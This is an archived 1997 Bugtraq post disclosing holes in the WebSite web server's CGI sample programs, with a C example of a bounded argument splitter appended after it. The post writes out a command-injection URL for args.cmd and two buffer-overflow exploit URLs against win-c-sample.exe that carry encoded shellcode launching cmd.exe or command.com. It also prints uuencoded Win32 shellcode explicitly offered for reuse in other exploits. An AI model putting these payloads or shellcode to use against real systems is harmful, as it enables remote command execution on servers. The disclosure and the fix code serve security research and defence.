Bugtraq mailing list archives
Re: signal handling
From: solar () ideal ru (solar () ideal ru)
Date: Mon, 6 Jan 1997 20:56:21 -0500
Hi! Actually, this message is about buffer overflows in Windows, in general. But let me put some exploits in here first. I just happened to check out WebSite v1.1e for Windows NT and '95. There're some nice security holes there, in the CGI example programs (should I say - "as usual"?). The first thing that I noticed is about the scripts, they have the following lines in cgi-dos/args.cmd (and some others):
rem NEVER NEVER ECHO URL COMPONENTS UNQUOTED!!! Consider
rem a query string of xxx&del+/s+c:\*.* Your hard drive gets
rem erased!! Same goes for args and extra path info!!!
and then some lines like this:
echo QUERY_STRING="%QUERY_STRING%"
Obviously, just using the quotes is not enough. Why can't I close them, or use a linefeed? The exploit can be:

http://website.host/cgi-dos/args.cmd?"&any+dos+command"

Well, the stuff I just told you about might be too obvious; some sysadmins I know already have all the example scripts removed. Now, let's get to the interesting stuff. There's also an example C program, compiled to cgi-shl/win-c-sample.exe, with the source provided in cgi-src/win-c-sample/win-c-sample.c, and the following line in there:
char *argv[32]; // Max 32 command line args
That's a WinMain local variable, and is passed to SplitArgs(), which does no bounds checking while filling it with the command line parameters. You know what that means -- a nice buffer overflow. Here are the exploits (I split the long URLs into several lines), you can use any dos command in them (replace spaces with _'s):

-- WinNT (any version?):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

-- Win95 (the release version only, will crash others!):

http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm

The example dos commands just copy the WebSite's readme.1st file, so you can later check if the exploit worked by trying http://website.host/x1.htm. Note that the server should respond to these exploits with an "Error: no blank line separating header and data", because of the "1 file(s) copied" message appearing without a blank line before it (which is required for HTTP; if you need a command's output, you can redirect it to a file, and get that file via HTTP with a separate request).

Finally, to the thing I'm writing this message for -- I mean the Win32 shellcode. I haven't seen any Win32 overflow exploits before (actually, didn't look for them), so I had to code my own shellcode. This seems not to be as simple as it would be for Win16, or as it is for most UNIX systems. The problem is that normally Windows kernel calls require extra relocation items, but the shellcode appears in an already loaded program.
The solution I used in the exploits above is doing a call to a fixed kernel offset. Actually, the WinNT exploit does pattern searches in the kernel (due to the number of different kernel versions out there), while the Win95 one uses fixed offsets (I don't have Win95 myself, thanks must go to Lord Byte for loading his WinIce and telling me the offsets). The two functions I use are WinExec and ExitProcess. Here're the two shellcodes in binary, uuencoded, so you can use them in your own exploits if you wish.

begin 644 shell_nt.bin
M:%Y8_^;_U(/&3&H!5HH&/%]U`X`N/T9!283`=?!H,!#P=UEH35QY6U@%,%!Z
F4$$Y`77P@^D0_]%H,!#P=UEHT%!V3%@%,#!V4$$Y`77P@^D<_]'[
`
end

begin 644 shell_95.bin
M:%Y8_^;_U(/&,FH!5HH&/%]U`X`N/T9!283`=?"Z=&]\7[ET8'U@`\K_T;I8
,7WQ?N5A0?&`#RO_1
`
end

Note that I had to avoid using some codes (which the server didn't allow me to use), that's why I do things like:

        db 68h          ; push imm32
        pop esi         ; \
        pop eax         ; | - the value being pushed
        jmp esi         ; /
        call esp

instead of:

        call $+5        ; would contain zeroes
        pop esi

Have fun disassembling. I'll appreciate any suggestions on doing the kernel calls a better way.

As for the holes -- the fix is obvious, just remove the examples after you, the webmaster, have checked them out. Also, the holes will probably get fixed in the next WebSite release (I wonder if they credit me;-). BTW, they didn't even have the quotes in the scripts I mentioned above, in some earlier versions.

Signed,
Solar Designer
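The root of the second hole is that SplitArgs() keeps writing into the fixed argv[32] no matter how many arguments arrive. The following is an added example (not WebSite's sample code and not from the post above): a splitter that fills the same fixed 32-entry array but refuses a command line carrying more arguments than the array holds, so the request is rejected instead of the stack frame being overwritten. split_args_bounded and accepts_arg_count are names made up here, and the input they work on is constructed.

```c
#include <stddef.h>

#define MAX_ARGS 32   /* the same fixed size as win-c-sample's argv[32] */

/* Split cmdline in place on spaces into argv[], never writing past
 * max_args entries. Returns the argument count, or -1 when the input
 * carries more arguments than the array can hold; the caller should
 * then reject the request instead of continuing with a clobbered
 * stack frame, which is what the unchecked original would do. */
int split_args_bounded(char *cmdline, char *argv[], size_t max_args)
{
    size_t argc = 0;
    char *p = cmdline;

    while (*p != '\0') {
        while (*p == ' ')                   /* skip separators */
            p++;
        if (*p == '\0')
            break;
        if (argc >= max_args)               /* the check the original lacked */
            return -1;
        argv[argc++] = p;
        while (*p != '\0' && *p != ' ')     /* find the end of this token */
            p++;
        if (*p == ' ')
            *p++ = '\0';                    /* terminate the token */
    }
    return (int)argc;
}

/* Constructed input: a command line of n one-character arguments, the
 * shape of the post's "+-+-+-..." query string once '+' has become ' '.
 * Returns what the bounded splitter reports for it. */
int accepts_arg_count(size_t n)
{
    char buf[256];
    char *argv[MAX_ARGS];
    size_t i;

    if (2 * n >= sizeof buf)
        return -2;                          /* constructed input too long */
    for (i = 0; i < n; i++) {
        buf[2 * i] = '-';
        buf[2 * i + 1] = ' ';
    }
    buf[n > 0 ? 2 * n - 1 : 0] = '\0';
    return split_args_bounded(buf, argv, MAX_ARGS);
}
```

Exactly 32 arguments still fit; the 33rd makes the splitter return -1, which is the point at which the original sample started overwriting whatever sat next to argv[] on WinMain's stack.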